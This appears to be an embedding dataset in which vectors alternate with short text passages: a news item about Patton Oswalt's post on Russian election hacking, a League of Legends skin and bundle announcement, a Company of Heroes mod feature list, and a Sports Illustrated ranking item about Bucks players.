-4.735058922733515e-8, 0.04046359285712242, 0.08311264216899872, 0.03915942832827568, 0.0357477106153965, 0.02744673192501068, 0.002566778101027012, -0.04175436124205589, 0.038840509951114655, -0.06551551818847656, 0.016945581883192062, -0.043976105749607086, -0.05151299014687538, 0.05403986945748329, -0.04530268907546997, 0.04685194417834282, -0.01802104339003563, 0.03498931601643562, 0.0033942456357181072, -0.043649278581142426, 0.03428240865468979, -0.07281637191772461, 0.04726959392428398, 0.06079671159386635, -0.021990228444337845, -0.08481975644826889, -0.035731177777051926, -0.03287521377205849, -0.038352176547050476, -0.0004464932717382908, 0.043448250740766525, -0.023511573672294617, 0.07929123193025589, -0.024079585447907448, -0.0403667651116848, 0.032694753259420395, 0.03710080310702324, -0.11217306554317474, -0.054045774042606354, -0.019643664360046387, 0.028832977637648582, 0.0070302775129675865, 0.003411885118111968, 0.011064549908041954, 0.02564447559416294, -0.02953544445335865, -0.002627262379974127, 0.07261298596858978, -0.09210176020860672, -0.02024991810321808, -0.011172396130859852, -0.004574840888381004, -0.0017497381195425987, -0.019765295088291168, 0.02462470903992653, -0.04883752763271332, 0.030308224260807037, -0.0675172358751297, -0.06930754333734512, 0.020155536010861397, 0.011535420082509518, 0.0023294626735150814, -0.0024101922754198313, 0.044692933559417725, 0.058892734348773956 ]
Comedian Patton Oswalt has officially had enough with both Republicans and Democrats after the latest political scandal to erupt in the wake of Donald Trump’s presidential victory. Following the release of a CIA report that concluded Russian hackers interfered with the election to help secure the White House for Trump, Oswalt shared a no-holds-barred post on Facebook expressing his disgust at the state of American politics. “These newest revelations, that Russia hacked the election. Piles of evidence, teetering up to the sky. That Russia ALSO hacked the [Republican National Committee] and are holding them over a barrel because of what they know. Which would be hilarious if it wasn’t so frightening,” he wrote on Saturday. “And the boiling chaos that’s resulting from it. I’ve got conservative friends actually DEFENDING Russia on this,” Oswalt continued. “I’ve got progressive friends gloating that we’ve finally had done to us what we’ve done to other countries. That Hillary somehow deserves this. That WE somehow deserve this. That infuriating cliche about, ‘It’s actually GOOD if Trump destroys everything it’ll start a revolution BLAH BLAH BLAH F**KING BLAH.’” On Friday evening, Trump’s transition team dismissed the CIA report as a fabrication in a statement that also described the intelligence agency as “the same people that said Saddam Hussein had weapons of mass destruction.” “It’s time to move on and ‘Make America great again,’” the statement said. But Oswalt, for one, is putting his foot down and refusing to normalize the president-elect, whom he likens to a “grope-y, racist uncle who just won $50,000 playing scratch-offs.” “In the middle of it all is Trump ― bloated, grinning, oblivious, wearing his cheap baseball cap and ruining people’s lives with his Twitter,” Oswalt wrote. “While all around him ― smarter, better, exhausted people scramble around, trying to sweep up a china shop he keeps stumbling through, laughing the whole time at these stupid nerds picking up the broken pieces on the ground.”
[ -0.10979977250099182, -0.02561979740858078, 0.012957418337464333, 0.00235049263574183, 0.08603482693433762, -0.024908483028411865, 0.053232286125421524, -0.03905778005719185, 0.04996723681688309, -0.07503096759319305, -0.050059594213962555, 0.08817452937364578, 0.07872813194990158, 0.005976587533950806, -0.07365525513887405, 0.011337908916175365, -0.027960825711488724, -0.004904977511614561, -0.05654868856072426, 0.09886849671602249, -0.06260877847671509, -0.0260429996997118, 0.13081958889961243, 0.020408540964126587, 0.040696900337934494, 0.033865172415971756, 0.016665464267134666, 0.0013351845555007458, -0.08797312527894974, 0.03424445167183876, 0.06640278548002243, -0.024726277217268944, -0.060558393597602844, 0.012377635575830936, 0.036661840975284576, 0.005675320979207754, 0.06472562998533249, 0.026346568018198013, 0.05732531100511551, 0.02309427224099636, -0.018024303019046783, -0.12885890901088715, 0.012072053737938404, 0.054253868758678436, -0.06203700974583626, 0.055764954537153244, -0.006680475082248449, 0.0070632630959153175, -0.013645361177623272, -0.061082202941179276, -0.04946533218026161, 0.045220810920000076, -0.04127947613596916, -0.028948361054062843, 0.05872631072998047, 0.0078700827434659, 0.06475988030433655, 0.04977184534072876, 0.008367281407117844, 0.04010935127735138, 0.08398264646530151, -0.0022441865876317024, 0.023263517767190933, 0.036933183670043945, -0.01739688776433468, 0.02202346920967102, -0.0031117787584662437, 0.02535892277956009, -0.08186404407024384, 0.076486736536026, 0.08222740888595581, 0.05575864389538765, 0.013819818384945393, -0.033846691250801086, 0.036442406475543976, 0.012805389240384102, 0.015136925503611565, 0.06195199862122536, 0.027776453644037247, -0.02129974402487278, 0.11106285452842712, 0.06264898180961609, 0.024039171636104584, 0.002224140102043748, 0.027360079810023308, -0.03202774375677109, -0.015463494695723057, -0.06335008889436722, 0.0640576109290123, 0.09693175554275513, -0.09485373646020889, 0.00604091864079237, 0.03966769203543663, 0.047777239233255386, 0.012850096449255943, -0.05346556380391121, 0.026338348165154457, 0.009409366175532341, -0.06642737239599228, 0.04977618157863617, -0.09331133961677551, 0.035255637019872665, 0.027637815102934837, -0.06756066530942917, 0.015564432367682457, 0.003954771906137466, -0.016519695520401, 0.008188445121049881, -0.015668826177716255, 0.007900993339717388, 0.06411802768707275, -0.016581770032644272, 0.020551027730107307, -0.03933907672762871, 0.08067705482244492, 0.006694233976304531, -0.035237111151218414, -0.004897041711956263, -0.10514207184314728, 0.01659063808619976, 0.021775631234049797, 0.03768326714634895, -0.034727130085229874, 0.04841003939509392, 0.017913836985826492, -0.05246086046099663, -0.07544244825839996, 3.579237034879859e-33, 0.09834711998701096, 0.02279202826321125, -0.03544391691684723, 0.036649081856012344, -0.03079298511147499, 0.053245775401592255, -0.03792748227715492, -0.05697598680853844, -0.0019466853700578213, 0.07871043682098389, -0.03407694026827812, 0.0327150896191597, -0.039332445710897446, 0.004983683582395315, 0.03771263360977173, 0.07403748482465744, -0.050523146986961365, -0.0040954286232590675, -0.02496848814189434, -0.002000657143071294, 0.1062919944524765, 0.014869209378957748, -0.010942194610834122, -0.006311388686299324, 0.05747739225625992, -0.06772815436124802, 0.04543257877230644, 0.009865929372608662, 0.047471512109041214, 0.016340961679816246, -0.12073581665754318, -0.024917729198932648, -0.0396726131439209, 0.04401513561606407, 0.020530620589852333, -0.03191889449954033, -0.023174000903964043, -0.09722486883401871, -0.033177148550748825, 0.048096101731061935, 0.047548457980155945, 0.04881734400987625, -0.034946978092193604, -0.021799277514219284, 0.04559186100959778, 0.018729714676737785, -0.022570788860321045, 0.10773161798715591, 0.02229076251387596, -0.01688096858561039, 0.0056702871806919575, 0.04407915100455284, 0.03978215903043747, 0.0259332787245512, -0.05100225657224655, 0.016762034967541695, -0.004522066097706556, -0.015463079325854778, 0.06718236953020096, 0.008828897960484028, -0.006648663897067308, 0.0023136958479881287, -0.03968535736203194, 0.004724165424704552, -0.04971245676279068, -0.008062622509896755, -0.03824087604880333, -0.026755012571811676, -0.06621833145618439, 0.0744408518075943, -0.02063720114529133, -0.014462411403656006, -0.05474557355046272, -0.011977985501289368, -0.12821239233016968, -0.0750989243388176, 0.02418953739106655, 0.03730776906013489, 0.03555407002568245, -0.018416883423924446, 0.04970826581120491, -0.05274628847837448, 0.15533334016799927, -0.04013561084866524, -0.11045555770397186, 0.0023643532767891884, 0.039508942514657974, -0.03801684454083443, -0.030695823952555656, 0.08352748304605484, -0.17902126908302307, -0.032303377985954285, 0.010093809105455875, 0.020687641575932503, -0.12686826288700104, -5.159840167116108e-33, -0.059578247368335724, -0.07476009428501129, -0.015014219097793102, 0.08797752112150192, -0.04151830077171326, 0.011233793571591377, -0.026999566704034805, -0.003978788387030363, 0.011070522479712963, -0.02146938443183899, -0.03054007515311241, -0.022012975066900253, 0.08192270249128342, -0.04043811559677124, 0.05129938945174217, -0.08044779300689697, 0.0865125060081482, -0.031673017889261246, -0.06769340485334396, -0.030910054221749306, 0.03289841488003731, 0.06969800591468811, -0.057130277156829834, 0.04873650521039963, -0.033602334558963776, 0.016986707225441933, 0.12160046398639679, -0.029923081398010254, -0.07166870683431625, 0.03638138622045517, 0.02272844687104225, -0.0008168073836714029, -0.013427134603261948, 0.09310834109783173, 0.036458905786275864, 0.06808671355247498, 0.07679115980863571, -0.048368189483881, -0.11453626304864883, -0.05587185546755791, 0.01901281625032425, -0.00009581907943356782, -0.01933940500020981, -0.00705539109185338, -0.057581838220357895, 0.02161584421992302, -0.08720365911722183, 0.03184150159358978, 0.009255068376660347, -0.06253166496753693, -0.0024034057278186083, 0.0011905524879693985, -0.05226883292198181, 0.05321111902594566, -0.04911443963646889, -0.020310547202825546, 0.014659970998764038, -0.04460122436285019, 0.1097494438290596, -0.051402438431978226, -0.06278679519891739, -0.03129791095852852, -0.018683025613427162, -0.0585440918803215, -0.04494381323456764, -0.016072507947683334, 0.04827536270022392, -0.020640410482883453, 0.10045518726110458, 0.06491515040397644, 0.0021221418865025043, -0.017421936616301537, -0.027777457609772682, 0.0059752934612333775, 0.058115724474191666, 0.08327170461416245, -0.061906248331069946, 0.030464496463537216, -0.04499964416027069, 0.07697395235300064, 0.07305881381034851, -0.11776871979236603, 0.032771289348602295, -0.06095081567764282, 0.05615435540676117, 0.009822087362408638, 0.06507816165685654, 0.0036828676238656044, -0.020824775099754333, 0.019482962787151337, -0.01387298945337534, -0.0700661912560463, -0.05183662846684456, -0.005759610794484615, 0.048145487904548645, -6.275056563254111e-8, 0.02841378189623356, -0.017808474600315094, -0.05386383831501007, 0.04747174680233002, -0.005868732929229736, -0.056278329342603683, -0.004891150631010532, -0.0722445547580719, -0.03146291896700859, -0.044368091970682144, 0.09651058912277222, -0.029339507222175598, -0.06587988138198853, 0.0018030137289315462, -0.038730472326278687, -0.02260407991707325, -0.024474352598190308, -0.05149339511990547, -0.049936484545469284, 0.029274296015501022, -0.016889303922653198, -0.0312989316880703, -0.03377316892147064, 0.009241001680493355, 0.028126858174800873, 0.017458045855164528, -0.02741057612001896, -0.022340649738907814, 0.02654891088604927, 0.046946924179792404, -0.07759160548448563, -0.0842207819223404, -0.08111882954835892, 0.019633911550045013, -0.0832166075706482, 0.011021547950804234, 0.014360472559928894, -0.002541378838941455, 0.08026915043592453, 0.04326086863875389, -0.02016572467982769, -0.037807025015354156, 0.07232052832841873, 0.010799319483339787, -0.0860796868801117, -0.04266445338726044, -0.02231132611632347, -0.01751999370753765, 0.030614173039793968, 0.012313533574342728, 0.018270835280418396, -0.04907206445932388, -0.04667024686932564, 0.046694353222846985, -0.03128832206130028, 0.027410712093114853, 0.015745654702186584, -0.037237852811813354, -0.07005053013563156, 0.0105277756229043, -0.044070739299058914, -0.04284753277897835, 0.022861523553729057, -0.03398030251264572 ]
New patch time is approaching, summoners! And with it comes a new batch of scrumptious content. Here's the deal: Sivir, Annie, and that ever devious master-of-disguise Warwick are getting costume changes. Sivir is going from Battle Mistress to Warrior Princess. Miss Annie will be skipping through the Fields of Justice in her little red hood. And if you look close, you might catch a glimpse of that sly Warwick camouflaged in grandma's nightgown. Warrior Princess Sivir, Red Riding Annie, and Big Bad Warwick will all be yours for the taking in the new patch. In addition to these new skins, the much-anticipated Might of Demacia is joining the fray. That's right: Garen (http://www.leagueoflegends.com/board/showthread.php?t=93901) is on his way. Garen Bundles Not one to be left out of the costume party, Garen has a few wardrobe changes locked away in his armory. If you're down for a darker, crimson look, you can pick up the Sanguine Garen bundle and save 50% on the skin. But if you're really looking to smite your enemies with Demacian Justice in style, you can grab both the Sanguine Garen and Desert Trooper Garen skins for a greatly reduced price. Sanguine Garen Bundle Save 50% on the Sanguine Garen skin when you purchase the champion and skin together. - Garen champion + Sanguine Garen skin (normally 1105 RP) will be only 845 RP! Garen Double Bundle Save 40% on both the Desert Trooper Garen skin and the Sanguine Garen skin when you purchase the champion and skins together. - Garen champion + Desert Trooper Garen skin + Sanguine Garen skin (normally 1625 RP) will be only 1209 RP! These bundles will be available only until the end of the weekend following the patch, so don't miss out! Click on the Bundles tab in the Store to purchase these Garen bundles before it's too late! UPDATE: This sale has ended.
[ -0.11801286041736603, -0.009382686577737331, 0.03180898725986481, -0.05895892530679703, 0.023779751732945442, 0.010805538855493069, 0.07954127341508865, -0.029551131650805473, -0.07986406981945038, 0.024085545912384987, 0.04163408651947975, -0.07135499268770218, -0.0005134395323693752, -0.03782622143626213, 0.05525584518909454, 0.021027397364377975, 0.06303732842206955, 0.005030655302107334, -0.0824495404958725, 0.02218092605471611, -0.04527046158909798, -0.07971500605344772, -0.03565431013703346, 0.06300162523984909, -0.04257102683186531, 0.008829882368445396, -0.049719106405973434, -0.04077274352312088, -0.019608814269304276, -0.07025407999753952, -0.0800299346446991, -0.03993172198534012, -0.024198759347200394, 0.01584174670279026, -0.07647513598203659, -0.0043335906229913235, -0.0015161026967689395, 0.05571315810084343, -0.05471883341670036, 0.06281114369630814, -0.031810205429792404, -0.05752323195338249, -0.1574697494506836, 0.039560891687870026, 0.05384130775928497, -0.027351856231689453, 0.08273451775312424, -0.015255815349519253, -0.06055725738406181, 0.02748623862862587, 0.03998344764113426, -0.0078036002814769745, -0.015024189837276936, -0.008011437952518463, -0.039701156318187714, 0.06633248925209045, -0.0006281482637859881, -0.021969130262732506, 0.0636698454618454, -0.012097636237740517, -0.000977170537225902, 0.03487385809421539, -0.004498644731938839, -0.0003873092937283218, -0.06041862070560455, -0.05630427598953247, 0.0752754658460617, 0.0251903235912323, 0.051072925329208374, -0.027458125725388527, 0.022369174286723137, -0.0037417314015328884, -0.005652794614434242, -0.09543512016534805, 0.02187255769968033, 0.08043897151947021, 0.04725801199674606, -0.04829812049865723, 0.06220931559801102, -0.0064282044768333435, 0.06217470020055771, 0.03395787253975868, 0.0148549135774374, -0.010320642963051796, 0.008563250303268433, -0.04084852710366249, -0.05821969732642174, -0.06223669275641441, 0.03937993571162224, -0.09464317560195923, 0.07632745802402496, 0.012060163542628288, 0.005295161157846451, -0.010853305459022522, 0.09271688014268875, 0.1171240359544754, -0.04038391262292862, -0.002320864237844944, 0.04229937866330147, 0.07444027811288834, -0.019139578565955162, -0.04771767556667328, -0.06222175806760788, -0.009228702634572983, -0.019145382568240166, -0.051118720322847366, 0.07374030351638794, 0.002242889255285263, -0.04141741618514061, 0.025004982948303223, 0.06668846309185028, -0.051816392689943314, -0.03445545211434364, -0.02662602625787258, 0.020000386983156204, 0.13407522439956665, 0.02843324840068817, 0.029674671590328217, -0.061252325773239136, 0.0509912371635437, 0.08252371847629547, 0.01146584190428257, 0.020311623811721802, -0.020527204498648643, 0.05818137526512146, 0.08832164108753204, -0.028858426958322525, 3.823214560812871e-33, 0.060895174741744995, 0.08166418969631195, -0.061406463384628296, 0.033466778695583344, 0.06837525218725204, 0.030991189181804657, 0.09025754779577255, -0.039004847407341, -0.056217461824417114, 0.008391481824219227, -0.04324722662568092, 0.028699815273284912, -0.08268198370933533, 0.018333958461880684, -0.030975325033068657, 0.039358917623758316, 0.0011563592124730349, -0.011992013081908226, -0.016101917251944542, -0.00776990782469511, 0.041011981666088104, 0.11516505479812622, 0.003986170049756765, -0.008291392587125301, -0.0287019032984972, 0.01659676805138588, -0.011101920157670975, -0.006347259972244501, -0.011385004967451096, 0.004340078681707382, -0.028195155784487724, -0.030251167714595795, 0.0824851244688034, 0.04855087399482727, -0.06965028494596481, 0.04197647050023079, -0.09062282741069794, -0.07552608847618103, 0.020566431805491447, -0.046442970633506775, -0.049964580684900284, 0.08795087784528732, 0.02434876188635826, 0.0007818931480869651, -0.07991152256727219, 0.007149682380259037, 0.08145970851182938, -0.04195563867688179, -0.06644702702760696, -0.021262889727950096, 0.009721946902573109, 0.019081037491559982, -0.07593267410993576, 0.06700438261032104, -0.03458741307258606, 0.02002285234630108, -0.01914898119866848, -0.05672403424978256, 0.07507531344890594, 0.0009270854643546045, 0.07417904585599899, -0.034985996782779694, 0.013233429752290249, -0.011283116415143013, 0.020615383982658386, -0.02361081913113594, -0.023528218269348145, 0.011815868318080902, -0.05787774920463562, -0.01871006190776825, -0.0352843776345253, 0.04217090830206871, -0.07169803231954575, 0.005228857975453138, 0.01721275970339775, 0.002731144428253174, 0.034135766327381134, 0.020465398207306862, -0.03448835760354996, -0.04636703431606293, -0.04768162593245506, 0.11360585689544678, -0.053825587034225464, 0.04405806586146355, -0.025457533076405525, -0.12461484223604202, 0.05639154091477394, 0.004692764952778816, -0.009683117270469666, -0.05718572437763214, 0.08853396773338318, -0.004928279668092728, 0.02948431298136711, -0.0487959086894989, -0.01995965838432312, -3.934710934672334e-33, 0.057678692042827606, -0.039347536861896515, 0.03386378288269043, 0.03966011106967926, 0.05157285928726196, -0.021310975775122643, 0.05924207717180252, 0.021152880042791367, 0.0164855495095253, 0.02396256849169731, 0.057634931057691574, 0.018731046468019485, -0.04598018154501915, -0.009420916438102722, 0.008791815489530563, 0.01511292438954115, 0.07912767678499222, 0.0016379072330892086, 0.05035679414868355, 0.036994922906160355, 0.035493846982717514, 0.019222350791096687, -0.08067106455564499, -0.01811636984348297, -0.03110305219888687, -0.017036015167832375, 0.02533271349966526, -0.05596700683236122, -0.009438557550311089, -0.028333628550171852, -0.0638791173696518, -0.05002012476325035, -0.03958616778254509, -0.03611704707145691, 0.05987650156021118, 0.031244296580553055, 0.06254560500383377, 0.0052699497900903225, -0.08290551602840424, 0.005079128313809633, 0.01896938681602478, -0.10310051590204239, 0.03082234598696232, 0.1317400336265564, 0.035134851932525635, 0.018831681460142136, -0.031164128333330154, 0.06780635565519333, 0.003721148008480668, -0.001303447992540896, 0.05833657830953598, -0.05836976319551468, -0.0035749170929193497, 0.05829416587948799, -0.005117418710142374, -0.04079005867242813, -0.057485245168209076, 0.058089789003133774, -0.04789390042424202, 0.1092253103852272, 0.006925023626536131, -0.0023109987378120422, -0.10339085757732391, -0.12597592175006866, -0.012172677554190159, 0.023916449397802353, 0.02583182044327259, -0.006457179319113493, -0.02537410706281662, -0.03455200418829918, 0.01967010460793972, -0.09200073033571243, -0.06028090417385101, -0.05286145955324173, -0.008834505453705788, -0.08587808161973953, 0.019967500120401382, -0.017555831000208855, 0.09291589260101318, 0.01991913467645645, -0.004427012987434864, -0.043845031410455704, -0.020562363788485527, -0.011015611700713634, 0.09651616215705872, 0.05170958489179611, 0.05908486992120743, 0.11274518817663193, 0.043714553117752075, -0.07488587498664856, -0.0651974081993103, -0.012064451351761818, 0.022047262638807297, 0.035507265478372574, 0.020678337663412094, -5.7835485733903624e-8, 0.03975524753332138, 0.04371188208460808, -0.014234055764973164, -0.01707502081990242, -0.05414845421910286, 0.018024345859885216, -0.04937189444899559, 0.00744383130222559, -0.007246298715472221, 0.11192656308412552, 0.10416451096534729, 0.04653734341263771, 0.022531498223543167, -0.08121076971292496, 0.007652889937162399, 0.08896474540233612, -0.08676763623952866, 0.06639335304498672, -0.03988085687160492, -0.04943261668086052, -0.06544287502765656, 0.06673479825258255, -0.004074064549058676, -0.046637509018182755, 0.008243147283792496, -0.056667767465114594, 0.008357175625860691, -0.0062858029268682, -0.0021422887220978737, 0.021174268797039986, 0.02614743448793888, -0.02476642280817032, 0.056243058294057846, -0.04421812295913696, -0.013698152266442776, -0.025967096909880638, -0.020626917481422424, 0.006850923877209425, 0.12120978534221649, 0.010524425655603409, -0.015728866681456566, -0.050920385867357254, -0.006962794344872236, -0.038897667080163956, -0.01266505941748619, -0.07316668331623077, 0.002560561988502741, -0.0883125364780426, 0.01085904985666275, -0.021871445700526237, 0.009777477942407131, -0.06923918426036835, 0.04843631759285927, 0.09406890720129013, 0.033524081110954285, -0.052670471370220184, 0.004411898087710142, 0.027510570362210274, 0.07870646566152573, 0.07244717329740524, 0.012486141175031662, -0.15076667070388794, -0.04472960904240608, 0.04414316266775131 ]
Play all four Company of Heroes armies (British, Panzer Elite, American, Wehrmacht) A new game mode: Reinforcements. Which sees players coming in at different stages of the battlefield. The ability to choose Allied/Axis attack 34 maps specifically designed for Europe in Ruins as well as the ability to play all of your old Company of Heroes favourites! A brand new launcher Complete persistency, All units retain vet, and continue to use it in their next battles. A complete installer that contains the Europe in Ruins files, launcher, and maps Basic unit unlock doctrines A new soft capping availability system New Advantages System Europe in Ruins takes the fast paced, intense and surreal combat that you've come to know from Company of Heroes and combines it with persistent environment, ever changing meta-gameplay and ongoing war. The modification sees you creating and commanding your very own battalion in which you can customise with any units and upgrades you wish; Company of Heroes strategy has never had so much choice. Not only do you get to build up your battalion, but as you units battle, they will gain and retain all the experience they have earned, carrying over from battle to battle; going from green to elite! Not only do units gain veterancy, but your battalion as a whole increases in effectiveness through doctrine unlocks and other advantages. Each of these are designed so that the player can tailor their battalion to their own likes and play styles. The combinations choices are endless!Europe in Ruins: Reinforcements adds to the already ground breaking game play of Europe in Ruins by adding in the British Commonwealth, the Panzer Elite, new game mode, a bunch of new maps, the new Advantages system and a whole new back-end launcher with new innovative systems for army purchase and persistence. What is in this latest release:
[ 0.01705957017838955, 0.000715147762093693, -0.04364838823676109, -0.09619682282209396, 0.019054744392633438, 0.05463055893778801, -0.050152357667684555, 0.01107807457447052, -0.07129330933094025, 0.0351223424077034, -0.05233420804142952, -0.03743446245789528, 0.07376576215028763, 0.02323344722390175, 0.058726802468299866, -0.009433000348508358, 0.04135419428348541, -0.009282956831157207, 0.004178506787866354, -0.05868087336421013, -0.09813065826892853, -0.08426327258348465, 0.0536818653345108, 0.023354530334472656, 0.023592425510287285, -0.006505598314106464, -0.04935115575790405, 0.015101905912160873, -0.07640442997217178, -0.09489703178405762, 0.028584640473127365, 0.014932874590158463, 0.07515711337327957, -0.04087734967470169, 0.012193670496344566, 0.028186755254864693, 0.030883144587278366, -0.010781447403132915, -0.052741892635822296, 0.03089272230863571, -0.10376063734292984, -0.0028128246776759624, -0.03513960912823677, 0.029319889843463898, 0.044515855610370636, 0.03536064550280571, -0.016159987077116966, -0.003452804870903492, 0.03290025144815445, 0.06773359328508377, 0.06119442731142044, -0.034878987818956375, -0.021139299497008324, -0.031001729890704155, 0.02389531582593918, -0.042167820036411285, 0.009058123454451561, 0.025017471984028816, -0.056516800075769424, -0.04923722892999649, -0.02709065191447735, -0.07437331974506378, 0.03353894501924515, -0.0013054077280685306, -0.038219619542360306, -0.12722788751125336, 0.06733963638544083, 0.09238003939390182, -0.035732075572013855, -0.01830030232667923, 0.004619324579834938, -0.032778143882751465, 0.022732801735401154, -0.059730853885412216, 0.018480896949768066, 0.06170113757252693, -0.013387547805905342, -0.0365658737719059, -0.0015648428816348314, -0.03585980832576752, 0.028683694079518318, 0.08687176555395126, -0.013482971116900444, 0.006156133953481913, 0.024262577295303345, -0.038319122046232224, 0.026334326714277267, -0.0900445207953453, 0.13230031728744507, 0.049084655940532684, -0.01462483312934637, 0.0003807385510299355, 0.006078439299017191, 0.04103534296154976, 0.10316962748765945, 0.06737718731164932, 0.08433517068624496, -0.018100189045071602, -0.012810938060283661, 0.06151171773672104, 0.0027605751529335976, -0.08398445695638657, 0.026967380195856094, -0.02566375583410263, 0.016189446672797203, -0.019083349034190178, 0.02535640262067318, 0.07691715657711029, -0.06778550148010254, -0.060905151069164276, 0.03538382425904274, -0.02336391992866993, -0.030879054218530655, -0.07289841026067734, -0.002961353398859501, 0.038369376212358475, 0.010980022139847279, -0.03714417293667793, -0.006010525859892368, 0.087579645216465, 0.07203395664691925, -0.01120087318122387, 0.035602718591690063, 0.038976993411779404, 0.008718387223780155, 0.08471250534057617, 0.005025260150432587, 4.158499712471958e-33, -0.0253136083483696, 0.04139778017997742, -0.08947641402482986, 0.14659634232521057, -0.05878463760018349, 0.00021279510110616684, -0.007737780921161175, 0.0009987573139369488, -0.0630197748541832, -0.032383546233177185, -0.08771558851003647, 0.05557778850197792, 0.03629499301314354, 0.0965317040681839, 0.03220166638493538, -0.05277591943740845, -0.009628254920244217, 0.07567049562931061, -0.010235263966023922, -0.04047846794128418, 0.054701998829841614, 0.04539753869175911, -0.030790530145168304, -0.06909635663032532, 0.11392492800951004, -0.013869236223399639, -0.002742141718044877, 0.06625452637672424, -0.08433661609888077, -0.0047946106642484665, 0.0051531074568629265, 0.007975099608302116, -0.08124611526727676, -0.028427649289369583, -0.005856251809746027, 0.0534609779715538, -0.07767286151647568, -0.04319566488265991, -0.04274474084377289, 0.005882413126528263, -0.00500366510823369, -0.0009324654820375144, -0.11429023742675781, -0.0242334995418787, 0.08299694955348969, -0.02775186114013195, 0.0118702482432127, -0.0028556811157613993, -0.06640453636646271, -0.008687932975590229, -0.06157853081822395, 0.009520445019006729, -0.09158015251159668, -0.01690608076751232, -0.020052138715982437, 0.04564907029271126, 0.05888577923178673, -0.04972976818680763, 0.01791469193994999, -0.03922158107161522, -0.003651633393019438, -0.019292576238512993, -0.044186852872371674, 0.06658176332712173, 0.028569739311933517, 0.005477303639054298, 0.004025632981210947, 0.01963094063103199, -0.02797100879251957, -0.007499122526496649, -0.01578483358025551, -0.08244902640581131, 0.09454275667667389, 0.000920316728297621, 0.009707745164632797, 0.00027527319616638124, -0.016438452526926994, 0.01712147146463394, -0.033183563500642776, -0.0690324679017067, -0.0769926905632019, 0.04571506008505821, -0.10958721488714218, 0.0446663573384285, 0.021787937730550766, -0.007746498100459576, 0.0895901471376419, -0.11811722815036774, -0.013543550856411457, -0.05944793298840523, -0.06716004014015198, -0.09323885291814804, 0.07621044665575027, -0.004056527744978666, -0.0233436431735754, -4.947097730136352e-33, 0.0506875105202198, -0.008654871955513954, 0.024030981585383415, -0.017404936254024506, 0.03972383961081505, 0.0175766684114933, -0.04306060075759888, -0.026226256042718887, -0.11485039442777634, 0.032318759709596634, -0.019763538613915443, -0.010190550237894058, -0.048536818474531174, 0.03902252018451691, -0.09365130960941315, 0.008818566799163818, 0.07632502913475037, -0.01368068065494299, 0.01418928150087595, 0.03800112009048462, 0.06306017190217972, -0.008125565014779568, -0.021796656772494316, -0.020846685394644737, 0.022132936865091324, 0.016027649864554405, -0.07376312464475632, -0.024246565997600555, 0.018857451155781746, -0.006074362434446812, -0.018238285556435585, -0.07826991379261017, -0.0018215676536783576, -0.006642157211899757, 0.062139272689819336, 0.11826736479997635, 0.025693347677588463, -0.019324271008372307, -0.07396944612264633, 0.11198420822620392, -0.029938997700810432, -0.05115814879536629, -0.058441102504730225, 0.05374252051115036, -0.009888377971947193, -0.001612585736438632, 0.03253837674856186, -0.023652106523513794, -0.04567095264792442, -0.03748231753706932, 0.062478624284267426, -0.03561142086982727, -0.016291098669171333, -0.03051726147532463, -0.009457066655158997, -0.003951698541641235, 0.025806671008467674, -0.014631764963269234, -0.03723832592368126, 0.02228434383869171, 0.04995202273130417, 0.002841275418177247, 0.0014369513373821974, 0.07963109016418457, -0.07749558985233307, -0.06212123855948448, -0.06417786329984665, 0.06134095415472984, -0.0933150127530098, 0.11063160747289658, -0.11871790140867233, 0.0075317383743822575, -0.02176009863615036, -0.03281017020344734, 0.015795303508639336, -0.09002554416656494, -0.03015233762562275, -0.013283895328640938, -0.03514830768108368, -0.027311652898788452, -0.006207329221069813, -0.08269792050123215, 0.018352970480918884, 0.05901091918349266, -0.0035645407624542713, 0.06131576746702194, 0.02488766424357891, 0.075482577085495, 0.0899084135890007, 0.010980477556586266, 0.0010604957351461053, -0.02244289591908455, -0.013168658129870892, 0.07662272453308105, 0.044950153678655624, -6.044989220299612e-8, 0.0043464647606015205, 0.06779829412698746, -0.020735077559947968, 0.08625418692827225, -0.06714192032814026, -0.12340471893548965, -0.06527510285377502, -0.015176373533904552, 0.02740323171019554, 0.004670675843954086, 0.008196013048291206, 0.039680738002061844, -0.07283752411603928, -0.01811870187520981, 0.07906989008188248, 0.06223810836672783, -0.03326207399368286, 0.011223923414945602, -0.01938498392701149, 0.06916045397520065, -0.007814650423824787, 0.012458241544663906, 0.027203671634197235, -0.027963565662503242, 0.052302733063697815, 0.018928226083517075, -0.045798275619745255, -0.05598217248916626, 0.04515291377902031, 0.08568213135004044, 0.11221002042293549, 0.03070002608001232, -0.01002916507422924, 0.04607836529612541, 0.014147350564599037, 0.01747719757258892, 0.036301568150520325, 0.0007481139618903399, -0.04298309609293938, 0.06584427505731583, -0.010147972963750362, 0.009043330326676369, 0.010773067362606525, 0.0023026003036648035, 0.02063010446727276, 0.02308860421180725, -0.06485266983509064, -0.08227067440748215, -0.03825956583023071, -0.08370610326528549, 0.001883039833046496, 0.04888203740119934, -0.006675195414572954, 0.12423741817474365, 0.05782436579465866, 0.07969928532838821, 0.023114942014217377, 0.04075885936617851, 0.0946996733546257, 0.08530084043741226, 0.018753504380583763, -0.05563650652766228, -0.02286405675113201, -0.05485811457037926 ]
Sports Illustrated is releasing its annual list of the Top 100 players in the NBA and three Bucks appear on the list. Greg Monroe (63), Giannis Antetokounmpo (48) and Khris Middleton (39) all made the cut for the Top 100 this season, with two of them improving upon their ranking compared to last season. Antetokounmpo made a huge jump from No. 100 last season to No. 48 in this year’s rankings. This shouldn’t come as too much of a surprise as the Greek Freak set career highs in nearly every offensive category during the 2015-16 season while breaking through for five triple-doubles. Ben Golliver, who helped ranked the players for SI, said this about Giannis: “The individual results, as irrelevant to the standings as they might have been, were stunning: the 21-year-old Antetokounmpo averaged 19/9/7 after the break, monster numbers that bring to mind elite producers like LeBron James and Russell Westbrook. Viewed as a raw prospect when he was taken in the 2013 lottery, Antetokounmpo showed improvement as a pick-and-roll initiator and converted transition opportunities into points like a seasoned pro.” Middleton also rose in the rankings this year, moving up six spots from No. 45 to No. 39. Middleton averaged a career-high, and team-high, 18.2 points per game last season in addition to career highs in assists (4.7), steals (1.7) and minutes per game (36.1). Here’s what Rob Mahoney of Sports Illustrated had to say about Middleton: “The relatively anonymous Middleton scored in isolation at a volume and efficiency similar to Kyrie Irving, Kyle Lowry, and Isaiah Thomas last season, according to Synergy Sports. He did so while doubling as just the kind of unassuming floor spacer Milwaukee needed to flank Giannis Antetokounmpo and balance its most effective lineups. Middleton ranks this high on our list because he makes that balance look easy. Rare are the wings who can take over when called, step back when needed, and defend effectively throughout. Middleton qualifies, and the proportional dimensions of his game render the 25-year-old as one of the most universal players on our list.” Monroe was the final Buck to appear on the list, coming in at No. 